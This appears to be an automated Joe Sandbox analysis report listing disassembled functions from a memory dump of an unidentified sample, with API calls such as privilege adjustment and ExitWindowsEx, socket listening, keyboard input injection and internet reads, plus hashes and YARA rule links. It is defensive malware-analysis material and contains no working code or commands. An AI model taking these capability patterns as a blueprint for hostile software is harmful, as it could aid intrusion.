                                                                                                                                  • Opcode ID: 017b03a9e40e528722212c595f5d7721714cb133334213614f3ceea47088439c
                                                                                                                                  • Instruction ID: 6f1f274051c7617723caf7110fabdab1287137420b54d3d18fe8f7c9c385bb95
                                                                                                                                  • Opcode Fuzzy Hash: 017b03a9e40e528722212c595f5d7721714cb133334213614f3ceea47088439c
                                                                                                                                  • Instruction Fuzzy Hash: E2128870A00609DBDF44DFA4DA81AEEB7F5FF49300F209529E806FB250EB35A961DB50
                                                                                                                                  Function 00EE82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EDBF0F
                                                                                                                                    • Part of subcall function 00EDBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EDBF3C
                                                                                                                                    • Part of subcall function 00EDBEC3: GetLastError.KERNEL32 ref: 00EDBF49
                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00EE830C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                  • Opcode ID: 4207b43c7498e4f3d0b758677b272b4bd5f371ac2aa592358a16de004043a815
                                                                                                                                  • Instruction ID: 967797555a1ed20e5362434cec568522a3ba6da872fd733340896672ac265823
                                                                                                                                  • Opcode Fuzzy Hash: 4207b43c7498e4f3d0b758677b272b4bd5f371ac2aa592358a16de004043a815
                                                                                                                                  • Instruction Fuzzy Hash: 3401F77164035DEBE76816798E4BBFB3258DB10F84F142524F917F21D2EE609C0191A4
                                                                                                                                  Function 00EF91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EF9235
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9244
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00EF9260
                                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00EF926F
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9289
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00EF929D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                  • Opcode ID: 521b97713d6e11a08a286cec12371c1d8481b6c4d5f0922d530f67b9de612c16
                                                                                                                                  • Instruction ID: d26a24a95fecc0920af598de88937bdf0bd1f92410d93112f547f3fd8bdbf109
                                                                                                                                  • Opcode Fuzzy Hash: 521b97713d6e11a08a286cec12371c1d8481b6c4d5f0922d530f67b9de612c16
                                                                                                                                  • Instruction Fuzzy Hash: 4821A231600208AFDB10EF64DC85B7EB7E9AF48324F109119FA56BB2A2CB34AD41DB51
                                                                                                                                  Function 00EAA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _memmove.LIBCMT ref: 00F13020
                                                                                                                                  • _memmove.LIBCMT ref: 00F13135
                                                                                                                                  • _memmove.LIBCMT ref: 00F131DC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1300846289-0
                                                                                                                                  • Opcode ID: 16543a5da8958c684ffeaee701d42c489da1af29c7c7ffb489c69fcac7798582
                                                                                                                                  • Instruction ID: 8dafa0a737cf84552e02f5336030dc3a773a8f21f7c9c8b883836e1194feef3d
                                                                                                                                  • Opcode Fuzzy Hash: 16543a5da8958c684ffeaee701d42c489da1af29c7c7ffb489c69fcac7798582
                                                                                                                                  • Instruction Fuzzy Hash: AB02A370E00209DFCF44DF68D981AAEBBF5EF49300F149069E806EB255EB31EA51DB91
                                                                                                                                  Function 00EF96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EFACD3: inet_addr.WS2_32(00000000), ref: 00EFACF5
                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EF973D
                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00EF9760
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                  • Opcode ID: 1be0f1713afc64f55f166760c0eddfd6783b307fbcd79a6687cc6143aef0a2ac
                                                                                                                                  • Instruction ID: f3df076e8af4233996d19ea4c119891501287628afbb1d3263c38878d844b14b
                                                                                                                                  • Opcode Fuzzy Hash: 1be0f1713afc64f55f166760c0eddfd6783b307fbcd79a6687cc6143aef0a2ac
                                                                                                                                  • Instruction Fuzzy Hash: 7941D370600214AFDB10AF64CC82EBEB7EDEF48324F14805DFA55BB392DA74AD018B91
                                                                                                                                  Function 00EEF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EEF37A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEF3AA
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEF3BF
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D0
                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EEF3FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                  • Opcode ID: 85f3381113e590d8770301b27aa3ca4881150288de8fbfa9d63883cfcf45df00
                                                                                                                                  • Instruction ID: fed3b16af6fdf5f86fcc3d7b27fd1ab76a0dbd30cd501baa37b6cce6b4eadf57
                                                                                                                                  • Opcode Fuzzy Hash: 85f3381113e590d8770301b27aa3ca4881150288de8fbfa9d63883cfcf45df00
                                                                                                                                  • Instruction Fuzzy Hash: 7241AC356047059FCB18DF69C490E9AB3E4FF49328F10412EEA6A9B3A1DB31AD41CB91
                                                                                                                                  Function 00EA6670 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1093COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: ,d
                                                                                                                                  • API String ID: 4104443479-40157079
                                                                                                                                  • Opcode ID: 83becd9f5852e5236acccd56bb13e0965b5a18b1dec21f488d10b2cd7c296d00
                                                                                                                                  • Instruction ID: 916cda0128f70b4eb71ad64aa8a3a66996efd707621509ec96a99f29362e8f36
                                                                                                                                  • Opcode Fuzzy Hash: 83becd9f5852e5236acccd56bb13e0965b5a18b1dec21f488d10b2cd7c296d00
                                                                                                                                  • Instruction Fuzzy Hash: F7A25A75D01219DFCB24CF58C8806ADBBB1FF4A314F2981AAE859BB391D734AD81DB50
                                                                                                                                  Function 00EE4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EE439C
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EE43B8
                                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00EE4425
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00EE4483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  • Opcode ID: 43f2220842df8368b0a0bcda5d467f249c8b1bca8789d428b4f64d08bcfa2071
                                                                                                                                  • Instruction ID: 1c88e16e78ce63ab1bcb2566cb77853934d244f711ffd31c26289ff0022dc8a4
                                                                                                                                  • Opcode Fuzzy Hash: 43f2220842df8368b0a0bcda5d467f249c8b1bca8789d428b4f64d08bcfa2071
                                                                                                                                  • Instruction Fuzzy Hash: 824117F0E0028CAAEF309B6698097FDBBF5AB45315F04111AF491B32C1C7B48D859765
                                                                                                                                  Function 00F0EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0EFE2
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F1F3C3,?,?,?,?,?), ref: 00F0EFF7
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0F041
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F1F3C3,?,?,?), ref: 00F0F077
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423138444-0
                                                                                                                                  • Opcode ID: 2296c877d92d6cb1601370d2b1c785c950b4f224348c4b52fe1ba64e6676bc83
                                                                                                                                  • Instruction ID: d0c2cbd2d09748cc0fae2b262a370d44ddec8442044439409eafa03ef882d201
                                                                                                                                  • Opcode Fuzzy Hash: 2296c877d92d6cb1601370d2b1c785c950b4f224348c4b52fe1ba64e6676bc83
                                                                                                                                  • Instruction Fuzzy Hash: F0219F35A00118EFCB258F58C898EEA7BB9FF49764F184069F905972A2C3719D51FBA0
                                                                                                                                  Function 00EE220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EE221E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: ($|
                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                  • Opcode ID: 22966462136086723e9db75757b2d00622c196ef597d22485d2f824ae1c5b88d
                                                                                                                                  • Instruction ID: 5e1625a433c5e53e839042a9bbbcbd630e2b00d727b08b4cd2521c569b093e97
                                                                                                                                  • Opcode Fuzzy Hash: 22966462136086723e9db75757b2d00622c196ef597d22485d2f824ae1c5b88d
                                                                                                                                  • Instruction Fuzzy Hash: 9C323674A006059FC728CF69C480A6AF7F4FF48314B15D46EE69AEB3A1E770E941CB44
                                                                                                                                  Function 00EBAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00EBAE5E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: a0f66289ee4fc7b261df4a858c048b5e133a1e8d020aa41c765a641cb131ff03
                                                                                                                                  • Instruction ID: 8edd30cdc0f3d504e08f3b3b5619bf0f5373f3dce1a4eef60da91fdb14eccf96
                                                                                                                                  • Opcode Fuzzy Hash: a0f66289ee4fc7b261df4a858c048b5e133a1e8d020aa41c765a641cb131ff03
                                                                                                                                  • Instruction Fuzzy Hash: B4A106B0504205BADF38AE298C88DFF395CEB85755B1C553AF512F61E2CA29CC85B273
                                                                                                                                  Function 00EF550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EF4A1E,00000000), ref: 00EF55FD
                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF5629
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                  • Opcode ID: 2ee5217d685ff8e99a59fa4dc0996ffc1d83badd697d9692fde1266d35e8e276
                                                                                                                                  • Instruction ID: 23f53a67fa06914cb06931eb16cb51fb022d96decb524b5c1853bd91fd7f830f
                                                                                                                                  • Opcode Fuzzy Hash: 2ee5217d685ff8e99a59fa4dc0996ffc1d83badd697d9692fde1266d35e8e276
                                                                                                                                  • Instruction Fuzzy Hash: 6341D272500A0DBFEB209F94CC85EBBB7FDEB50718F10502EF715B6181DA719E419A64
                                                                                                                                  Function 00EEEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEEA95
                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEEAEF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEEB3C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                  • Opcode ID: 39bdd9620545330cd033e411049016679e01d18e63e85984bd4d7c00e3235c49
                                                                                                                                  • Instruction ID: 522fb7e17fbcf4e99fd9abf1cd8457422fb99824e5309c2aea75233e0e542b2d
                                                                                                                                  • Opcode Fuzzy Hash: 39bdd9620545330cd033e411049016679e01d18e63e85984bd4d7c00e3235c49
                                                                                                                                  • Instruction Fuzzy Hash: 99214A35A00218EFCB00DFA5D894AEEBBF8FF49314F1480A9E905AB351DB31A915CB50
                                                                                                                                  Function 00EE70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EE70D8
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00EE7115
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EE711E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
